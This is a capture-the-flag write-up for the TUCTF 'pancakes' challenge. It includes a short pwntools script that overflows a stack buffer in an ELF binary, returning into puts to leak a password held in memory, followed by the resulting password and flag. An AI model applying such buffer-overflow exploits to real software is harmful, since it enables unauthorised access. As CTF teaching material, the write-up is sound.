pancakes

You ever just get a craving for pancakes?

nc chal.tuctf.com 30503

Recon

Again another ELF binary which asks for a password. The password is loaded from a file password.txt and if correct it will display the contents of flag.txt. The idea was to build a ROP chain that opens flag.txt and puts the contents to stdout, but I noticed the contents of password.txt was on the stack, so I just choose to display that and then use it to get the flag manually.

Code

from pwn import *

s = process("./pancakes")
s = remote("chal.tuctf.com", 30503)

pwdata = 0x804c060
aputs = 0x8049060

print s.recvuntil("> ")

buf  = "A"*44
buf += p32(aputs)
buf += "DDDD"
buf += p32(pwdata)

s.send(buf)
print s.recvall(timeout=2)

Flag

$ ./pancake.py 
[+] Starting local process './pancakes': pid 28676
[+] Opening connection to chal.tuctf.com on port 30503: Done
Enter pancake password
> 
[+] Receiving all data: Done (38B)
[*] Closed connection to chal.tuctf.com port 30503
Try harder
l0r3m_1p5um_d0l0r_517_4m37

$ nc chal.tuctf.com 30503
Enter pancake password
> l0r3m_1p5um_d0l0r_517_4m37
TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}

Running it gives us the password l0r3m_1p5um_d0l0r_517_4m37 and with that we got the flag TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}.